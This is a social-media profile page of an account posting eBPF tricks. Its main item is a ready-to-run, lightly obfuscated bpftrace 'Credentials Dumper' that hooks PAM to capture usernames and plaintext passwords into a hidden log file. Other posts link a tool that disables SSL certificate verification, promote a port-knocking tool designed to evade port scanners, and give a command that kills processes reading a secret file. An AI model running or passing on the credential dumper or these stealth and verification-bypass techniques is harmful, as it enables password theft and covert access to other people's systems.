@ebpftoy profile picture
ebpftoy @ebpftoy

Fun with eBPF

Joined July 2022
  • Tweets 6
  • Following 0
  • Followers 20
4 Photos and videos
ebpftoy@ebpftoy
9 Aug 2022
Knockles ➞ An eBPF Port Knocking Tool 👀
eeriedusk@eeriedusk
9 Aug 2022
Here is Knockles 🦔! An eBPF port knocking tool made to remotely open a TCP connection while being completely invisible to port scanners. Enjoy! 🚪🐝 github.com/eeriedusk/knockle…
2
5
ebpftoy@ebpftoy
5 Aug 2022
Kill program that access to /tmp/secret.txt #eBPF bpftrace --unsafe -e 'tracepoint:syscalls:sys_enter_openat { if (strncmp("/tmp/secret.txt", str(args->filename), 15) == 0) { signal(9); }}'
3
3
ebpftoy@ebpftoy
15 Jul 2022
Disable SSL certificate verification using eBPF : github.com/citronneur/blinds…
2
3
ebpftoy retweeted
ebpftoy@ebpftoy
7 Jul 2022
1
ebpftoy@ebpftoy
7 Jul 2022
Credentials Dumper a="probe:/*b/x*u/*pam.*.0:pam_get_authtok";c="@handle[tid]";d=",str(*((uint64*)";sudo bpftrace -e "BEGIN {printf(\"pid,comm,user,pass\n\");}u$a{$c=arg0;}uret$a/$c/{printf(\"%d,%s,%s,%s\n\",tid,comm$d($c 48)))$d$c)));delete($c);}"|sudo tee /tmp/auth>/*/null&
1
2
9
ebpftoy@ebpftoy
7 Jul 2022
1
Load more